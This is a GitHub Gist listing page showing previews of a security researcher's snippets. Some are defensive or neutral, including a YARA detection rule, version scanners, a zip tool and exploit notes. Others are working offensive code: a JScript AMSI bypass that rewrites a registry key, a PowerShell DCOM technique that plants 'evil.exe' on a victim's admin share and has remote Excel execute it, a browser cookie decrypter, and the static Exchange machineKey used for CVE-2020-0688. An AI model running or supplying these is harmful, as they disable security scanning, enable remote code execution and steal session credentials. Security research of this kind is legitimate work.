Skip to content

Instantly share code, notes, and snippets.

@rxwx
rxwx / offver.py
Created Apr 15, 2020
Get Office version that last saved the file
View offver.py
import re
import sys
versions = {
0x00: 'Excel 97',
0x01: 'Excel 2000',
0x02: 'Excel 2002',
0x03: 'Office Excel 2003',
0x04: 'Office Excel 2007',
0x06: 'Excel 2010',
@rxwx
rxwx / vivaldi-decrypt.py
Last active May 14, 2020
Decrypt Vivaldi Cookies on MacOS
View vivaldi-decrypt.py
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
@rxwx
rxwx / pulseversion.py
Created Aug 13, 2019
Pulse Secure Version Scanner
View pulseversion.py
import requests
import sys
import re
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"}
if len(sys.argv) != 2:
print " Usage: python pulseversion.py <target ip/domain>"
sys.exit(1)
@rxwx
rxwx / bypass.js
Created Aug 16, 2018
AMSIEnable Bypass in JScript
View bypass.js
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
try{
var AmsiEnable = sh.RegRead(key);
if(AmsiEnable!=0){
throw new Error(1, '');
}
}catch(e){
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
@rxwx
rxwx / ziptool.ps1
Created May 4, 2018
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
<#
.SYNOPSIS
Author: Rich Warren
Based on original c# code by Jon Galloway:
https://weblogs.asp.net/jongalloway/creating-zip-archives-in-net-without-an-external-library-like-sharpziplib
.DESCRIPTION
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
@rxwx
rxwx / notes.md
Last active Feb 21, 2020
Notes on new Equation Editor Exploit, CVE-2018-0802 variant
View notes.md

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

@rxwx
rxwx / CVE_2017_8759_CRLF.yara
Created Sep 17, 2017
Yara rule to detect attempts to exploit .NET CLRF injection in a WSDL file (aka CVE-2017-8759)
View CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
meta:
description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
author = "Rich Warren @buffaloverflow"
reference = "https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html"
date = "2017-09-17"
strings:
$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
condition:
$s1
@rxwx
rxwx / foxprow.ps1
Last active Sep 14, 2017
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
View foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)
You can’t perform that action at this time.